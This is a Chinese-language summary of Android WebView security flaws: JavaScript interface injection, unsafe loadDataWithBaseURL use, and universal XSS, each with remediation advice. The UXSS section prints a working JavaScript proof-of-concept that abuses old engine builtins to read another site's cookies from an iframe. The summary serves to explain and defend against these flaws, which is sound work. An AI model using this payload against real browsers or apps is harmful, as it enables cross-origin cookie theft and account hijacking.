Android WebView 安全问题汇总

一、addJavscriptInterface接口注入JS对象漏洞

问题描述

在使用WebView开发时注入JS对象，当App具有读写SDCARD权限，那么注入的JS对象就可以通过反射机制获取到Java对象Runtime，并调用静态方法来执行一些命令，如读写文件命令等。

解决方案

1. Google在4.2以上系统已经修复。 即使用@JavascriptInterface注解来声明JS访问的方法。
2. 对于4.2以下系统可以参考这个开源项目safe-java-js-webview-bridge
3. 删除Android系统内部注入的JS对象 webView.removeJavascriptInterface("searchBoxJavaBridge_");//android 4.2以下google默认添加的 webView.removeJavascriptInterface("accessibility"); webView.removeJavascriptInterface("accessibilityTraversal");

二、WebView API不安全使用（阿里聚安全）

Webview中可以用loadDataWithBaseURL加载一段html代码，函数原型如下： loadDataWithBaseUrl(String baseUrl, String data, String mimeType, String encoding, String historyUrl)。其中，baseUrl为默认的html代码，data为要加载的 html代码，mimeType为文本类型，encoding为编码格式，historyUrl为历史记录的html代码。如果baseUrl和data可控，则可让app加载指定的攻击html进行攻击。

攻击演示：某app对loadDataWithBaseURL函数使用不当，恶意app可用该漏洞获取Databases目录下webview.db文件。

解决方案：

1. baseUrl和data不要让用户可控。
2. 禁止File域下执行js。

三、uxss（通用xss跨站脚本）漏洞

Uxss(Universal Cross-Site Scripting通用型XSS)UXSS是一种利用浏览器或者浏览器扩展漏洞来制造产生XSS的条件并执行代码的一种攻击类型。可以到达浏览器全局远程执行命令、绕过同源策略、窃取用户资料以及劫持用户的严重危害。

<script>

frame = document.body.appendChild(document.createElement("iframe"));

frame.src = "http://m.baidu.com/";

frame.onload = function() {

Function("}, (builtins = this), function() {");

originalInstantiate = builtins.Instantiate;

builtins.DefineOneShotAccessor(builtins, "Instantiate", function() {});

flag = 0;

template = null;

builtins.Instantiate = function(x, y) {

if(flag) {

doc = frame.contentWindow.document;

alert(doc.cookie);

flag = 0;

} else if(!template)

template = x;

return originalInstantiate(x, y);

};

document.implementation;

flag = 1;

builtins.ConfigureTemplateInstance(frame.contentWindow, template);

}

</script>

测试结果（成功跨域读取目标m.baidu.com）的cookie信息

修复建议

1. 服务端禁止iframe嵌套X-FRAME-OPTIONS:DENY。 2. 客户端使用setAllowFileAccess(false)方法禁止webview访问本地域。详见：setAllowFileAccess(boolean)
2. 客户端使用onPageStarted (WebView view, String url, Bitmap favicon)方法在跳转前进行跨域判断。
3. 客户端对iframe object标签属性进行过滤。